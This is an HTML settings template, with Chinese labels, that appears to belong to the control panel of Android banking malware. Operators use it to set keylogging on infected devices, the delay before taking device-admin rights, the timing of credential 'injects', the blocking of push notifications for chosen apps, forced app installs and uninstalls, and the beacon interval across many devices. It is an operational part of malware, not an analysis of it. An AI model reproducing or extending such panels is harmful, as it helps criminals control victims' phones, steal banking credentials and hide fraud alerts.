<form method="post" style='display: inline;'>

<div class="row">
	<!-- left pane -->
<div class="col-lg-6">

	<div class="panel panel-default">
		<div class="panel-heading" style="height: 50px">
			<h3 class="panel-title">全局设置
			<input style="float: right" type="submit" value="保存" class="btn btn-primary btn-sm" />
			</h3>
		</div>

		<div class="panel-body">

<div class="row">
	<div class="col-md-6">
额外域名 <textarea class="form-control" rows="5" name="field[domains]" placeholder="domain1.com
domain2.org
domain3.xxx">%CONF_DOMAINS%</textarea>
	</div>
	<div class="col-md-6">
		%TEST_SERVER_ERRORS%
		服务器时间: <code>%SERVER_TIME%</code><br />
		许可证有效期至: <code>%EXPIRE_ON%</code><br />
		注入版本: <code>%SMARTS_VER%</code><br />
		最后备份时间: <code>%LAST_BACKUP_AT%</code><br />
	</div>
</div>
<br />
<div class="row">
	<div class="col-md-6">
期望安装的应用 (+ 所有注入) <textarea class="form-control" rows="5" name="field[desired_apps]" placeholder="%PKG_PLACEHOLDER%">%DESIRED_APPS%</textarea>
	</div>
	<div class="col-md-6">
屏蔽推送通知的应用 <textarea class="form-control" rows="5" name="field[block_push_apps]" placeholder="%PKG_PLACEHOLDER%">%BLOCK_PUSH_APPS%</textarea>
	</div>
</div>

<div class="row"  style="margin-top: 20px">
	<div class="col-md-6">&nbsp;</div>
	
	<div class="col-md-6">
		延迟屏蔽
		<input type="text" name="field[block_push_delay]" value="%BLOCK_PUSH_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		秒
	</div>
</div>

<br />
<div class="row">
	<div class="col-md-6">
最小化应用 <textarea class="form-control" rows="5" name="field[minimize_apps]" placeholder="%PKG_PLACEHOLDER%">%MINIMIZE_APPS%</textarea>
	</div>
	<div class="col-md-6">
卸载应用 <textarea class="form-control" rows="5" name="field[uninstall_apps]" placeholder="%PKG_PLACEHOLDER%">%UNINSTALL_APPS%</textarea>
	</div>
</div>

<div class="row"  style="margin-top: 20px">
	<div class="col-md-6">
延迟最小化
		<input type="text" name="field[minimize_delay]" value="%MINIMIZE_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		秒
	</div>
	
	<div class="col-md-6">
		延迟卸载
		<input type="text" name="field[uninstall_delay]" value="%UNINSTALL_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		秒
	</div>
</div>


		</div>
	</div>


</div>
	

	<!-- right pane -->
	<div class="col-lg-6">

		<div class="panel panel-default">
			<div class="panel-heading"  style="height: 50px">
				<h3 class="panel-title">设备默认设置
				<input style="float: right" type="submit" value="保存" class="btn btn-primary btn-sm" />
				</h3>
			</div>
			<div class="panel-body">

<div class="row">
<div class="col-md-6">
	<label for="keylogger_enabled_chk">启用键盘记录 </label>
	<input id="keylogger_enabled_chk" type="checkbox" name="field[keylogger_enabled]" %KEYLOGGER_ENABLED_CHK% />
</div>
<div class="col-md-6">
	延迟键盘记录
	<input type="text" name="field[keylogger_delay]" value="%KEYLOGGER_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
	秒
</div>
</div>

<br />

<div class="row">
<div class="col-md-6">
	延迟注入
	<input type="text" name="field[injects_delay]" value="%INJECTS_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
	秒
</div>

<div class="col-md-6">
延迟获取设备管理员
		<input type="text" name="field[get_device_admin_delay]" value="%GET_DEVICE_ADMIN_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
		秒
</div>
</div>

<div class="row"  style="margin-top: 20px">

	<div class="col-md-6">
		心跳间隔
	<input type="text" name="field[net_delay]" value="%NET_DELAY%" class="input-sm" style="border: 1px solid #ccc; color: #555; display: inline-block" size="5" />
	秒
	<p class="%PING_WARN_HIDE% text-center" style="margin: 0"><b style="color: darkred;">间隔太小。</b> <button type="button" class="btn btn-xs btn-danger" onclick='alert("在大量设备的情况下会导致服务器负载过高。推荐的最小间隔是60秒。")'>?</button></p>
	</div>
	
	<div class="col-md-6">
&nbsp;
	</div>
</div>

			</div>
		</div>

	</div> <!-- end right pane -->



</div> <!-- end main row -->

</form>
